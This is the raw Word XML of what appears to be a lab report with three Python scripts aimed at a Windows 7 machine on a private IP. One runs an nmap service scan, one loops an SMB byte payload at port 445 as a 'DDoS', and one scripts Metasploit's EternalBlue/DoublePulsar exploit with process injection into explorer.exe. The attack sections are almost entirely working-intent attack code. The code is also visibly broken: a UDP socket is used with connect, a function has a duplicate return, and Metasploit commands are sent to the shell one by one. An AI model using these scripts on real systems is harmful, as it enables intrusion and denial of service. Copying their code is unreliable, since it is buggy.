      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t># Function defines the target scan</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>def nmap(host):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F7DB8" w14:textId="6FDF9B14" w:rsidR="241621B9" w:rsidRDefault="241621B9" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Stores results into a text file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    out = open('nmapscan.txt', 'a')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    cmd = ['nmap', '-sV', host]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    return subprocess.call(cmd, stdout = out)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    return subprocess.call(cmd)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">    out.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>host = input('what IP would you like to Scan? ')</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1FF18184" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>print(nmap(host))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C703B2" w14:textId="40D1A093" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B97C360" w14:textId="6BE0D340" w:rsidR="1806ED3F" w:rsidRDefault="1806ED3F" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows 10 to DoS Windows 7 Script</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6863E104" w14:textId="19A03565" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3276AC8A" w14:textId="60920C37"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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1EEFEC" w14:textId="15746E8E"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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE74AEE" w14:textId="0D2FFDD2"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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A877B" w14:textId="1C4A0476"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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7B7A5" w14:textId="004983DD"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lastRenderedPageBreak/>
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E1E79" w14:textId="2114EC19"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#Code Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B203D1" w14:textId="45DFD0D3"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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33423762" w14:textId="496ED4C1"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now = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2555D5" w14:textId="19857E5F"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hour = now.hour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F15971" w14:textId="05489831"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minute = now.minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1788E3B4" w14:textId="71980AA7"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day = now.day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467063BC" w14:textId="129BD93A"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month = now.month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749C2C95" w14:textId="46723DDA"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year = now.year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3380661C" w14:textId="2A45FA42" w:rsidR="5D5004AD" w:rsidRDefault="5D5004AD" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DF290F" w14:textId="51F1C8F0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860F6AC" w14:textId="3F50A726"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sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572430B5" w14:textId="756DDF07"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data= "\x00\x00\x00\x9a\xfe\x53\x4d\x42\x40\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639ACBA0" w14:textId="5345A95C"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"\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608425BA" w14:textId="48D9B286"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"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F38863" w14:textId="63E54838"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"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7F29B" w14:textId="5AA8C014"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"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x01"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C7BB8E" w14:textId="3CB1B699"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"\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41\xaa\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757F79C" w14:textId="16E854CE"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"\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF94BAE" w14:textId="7CF47FB4"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"\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01\xcb\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C46AC" w14:textId="0F9467BC"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"\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20\x60\x1c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5EF444" w14:textId="31F5E078"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"\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e\x30\x0c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A89A0" w14:textId="70B1ADD8"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"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a".join(sys.argv[1:])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF8AC2E" w14:textId="4FF02DAE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A08B87" w14:textId="48D44DB5" w:rsidR="5D5004AD" w:rsidRDefault="5D5004AD" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A88EA" w14:textId="7AEC7740"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os.system("clear")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C104B" w14:textId="558D5A8D"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os.system("DDos Attack")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C9D83" w14:textId="0FC39161"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print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535EADD2" w14:textId="6DC30FDC"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print ("DDOS attack to Windows 7")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B331F0" w14:textId="41111378"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print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5752A9D2" w14:textId="11F53353"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ip = ("192.168.169.110")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172472D2" w14:textId="7CCFCC84"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port = int("445")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722AF0CF" w14:textId="5E7BB7BE" w:rsidR="5D5004AD" w:rsidRDefault="5D5004AD" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCF13A" w14:textId="1758E694"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os.system("clear")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B58AB66" w14:textId="27A4FDDC"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os.system("figlet Attack Starting")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0698E1" w14:textId="73E69CBB"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print ("[                    ] 0% ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B1F0B" w14:textId="22D339B0"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time.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD2713" w14:textId="459EEF02"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print ("[=====               ] 25%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B381303" w14:textId="5A13F700"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time.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D31FF6" w14:textId="20DD6647"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print ("[==========          ] 50%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722C8584" w14:textId="285364EF"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time.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46578EC1" w14:textId="20660AE4"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print ("[===============     ] 75%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C35FECE" w14:textId="7B2BBEC0"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time.sleep(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36F64E" w14:textId="78A8AD44"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print ("[====================] 100%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E9A102" w14:textId="7BA85F67"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time.sleep(3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B534CBA" w14:textId="66031839"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sent = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1693CFAB" w14:textId="5A9056B5"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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438C174" w14:textId="6C6C3630"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    sock.connect((ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C104D09" w14:textId="71833882"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 xml:space="preserve">    print("Connected to the target")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3AC9E" w14:textId="44D91D7C"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 xml:space="preserve">    sock.sendall(bytes(data + "\n", "utf-8"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE94C77" w14:textId="61DF8A44"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 xml:space="preserve">    print("Lauching DDos to target:", ip, " port :", port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9DA56" w14:textId="50F8DD44"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 xml:space="preserve">    print("Sent:     {}".format(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C33F0C" w14:textId="5CA38BD4"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 xml:space="preserve">    # Receive data from the server and shut down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD0DBA" w14:textId="7C23386D"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 xml:space="preserve">    received = str(sock.recv(1024), ("utf-8"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056362F2" w14:textId="0C692DF7"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 xml:space="preserve">    print("Received: {}".format(received))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CF13C5" w14:textId="51CF9813"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 xml:space="preserve">    # sock.sendto(packet, (ip,port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08B54B" w14:textId="259F459C"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 xml:space="preserve">    # sent = sent + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5378EA8A" w14:textId="63A962F3"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 xml:space="preserve">    # port = port + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0284EFF9" w14:textId="029381BD"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 xml:space="preserve">    # print ("Sent %s packet to %s throught port:%s"%(sent,ip,port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118B1BA9" w14:textId="4080C744"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 xml:space="preserve">    # if port == 65534:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60016808" w14:textId="59334111" w:rsidR="5D5004AD" w:rsidRDefault="5D5004AD" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    #   port = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6934D374" w14:textId="56879722" w:rsidR="5D5004AD" w:rsidRDefault="5D5004AD" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4A00FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4A00FF"/>
        </w:rPr>
        <w:t xml:space="preserve">             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5639E30E" w14:textId="6B76AA47" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FDF4C8C" w14:textId="587A7677" w:rsidR="27879257" w:rsidRDefault="27879257" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Attack Windows 7 from Kali Linux: Automation Script for Reverse TCP Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E797" w14:textId="33826A30" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A94A5F2" w14:textId="7B7ED195" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFAF82" w14:textId="40C74E26" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cmd = "msfconsole"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583CF8EC" w14:textId="79D268EE" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P1 = subprocess.Popen(cmd, shell = True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35733717" w14:textId="7C2F43B3" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cmd = "use exploit/windows/smb/eternalblue_doublepulsar"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73623553" w14:textId="79D268EE" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P1 = subprocess.Popen(cmd, shell = True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1A7F0F" w14:textId="66E6F7ED" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cmd = "set rhosts 192.168.169.110"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EFF2E" w14:textId="79D268EE" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P1 = subprocess.Popen(cmd, shell = True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8FF2F9" w14:textId="2F30D81B" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cmd = "set processinject explorer.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE23C1" w14:textId="79D268EE" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P1 = subprocess.Popen(cmd, shell = True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DAE4B3" w14:textId="3328500A" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cmd = "run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7763A154" w14:textId="79D268EE" w:rsidR="4EEDDDA5" w:rsidRDefault="4EEDDDA5" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P1 = subprocess.Popen(cmd, shell = True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7AC089" w14:textId="74592893" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="775BB1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VjPf7CDTKY9qvn" int2:id="GrJArWlF">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="gI2AydBDi6sH5/" int2:id="dBigxe7X">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="9lwoxUqVTQdUef" int2:id="Vlurk08S">
      <int2:state int2:value="Rejected" int2:type="LegacyProofing"/>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B5B"/>
    <w:rsid w:val="001C575B"/>
    <w:rsid w:val="00410A67"/>
    <w:rsid w:val="00452F7C"/>
    <w:rsid w:val="005E50AA"/>
    <w:rsid w:val="006303CD"/>
    <w:rsid w:val="00773F51"/>
    <w:rsid w:val="007F02E3"/>
    <w:rsid w:val="00941AF3"/>
    <w:rsid w:val="00A53807"/>
    <w:rsid w:val="00AC42C1"/>
    <w:rsid w:val="00AC7223"/>
    <w:rsid w:val="00B07C84"/>
    <w:rsid w:val="00B16F44"/>
    <w:rsid w:val="00BE4AB3"/>
    <w:rsid w:val="00C02B5B"/>
    <w:rsid w:val="00D10B4F"/>
    <w:rsid w:val="00D16A79"/>
    <w:rsid w:val="00F241BC"/>
    <w:rsid w:val="00FD46B8"/>
    <w:rsid w:val="01399F35"/>
    <w:rsid w:val="016F0539"/>
    <w:rsid w:val="01847E1F"/>
    <w:rsid w:val="01B38CB2"/>
    <w:rsid w:val="02844595"/>
    <w:rsid w:val="029DC801"/>
    <w:rsid w:val="03BE603D"/>
    <w:rsid w:val="03F6AB07"/>
    <w:rsid w:val="0404B7F2"/>
    <w:rsid w:val="04D010EA"/>
    <w:rsid w:val="0518EDBD"/>
    <w:rsid w:val="0613ABF7"/>
    <w:rsid w:val="068F99A0"/>
    <w:rsid w:val="0698A0E5"/>
    <w:rsid w:val="06C53A3F"/>
    <w:rsid w:val="077DCF6A"/>
    <w:rsid w:val="077F0751"/>
    <w:rsid w:val="078674F4"/>
    <w:rsid w:val="079B5404"/>
    <w:rsid w:val="0809A9EA"/>
    <w:rsid w:val="0831CE7C"/>
    <w:rsid w:val="08791B5A"/>
    <w:rsid w:val="0A3D15E1"/>
    <w:rsid w:val="0A4E3C1A"/>
    <w:rsid w:val="0A725B1D"/>
    <w:rsid w:val="0A8B80FC"/>
    <w:rsid w:val="0A8F577A"/>
    <w:rsid w:val="0AAA103A"/>
    <w:rsid w:val="0ADD053D"/>
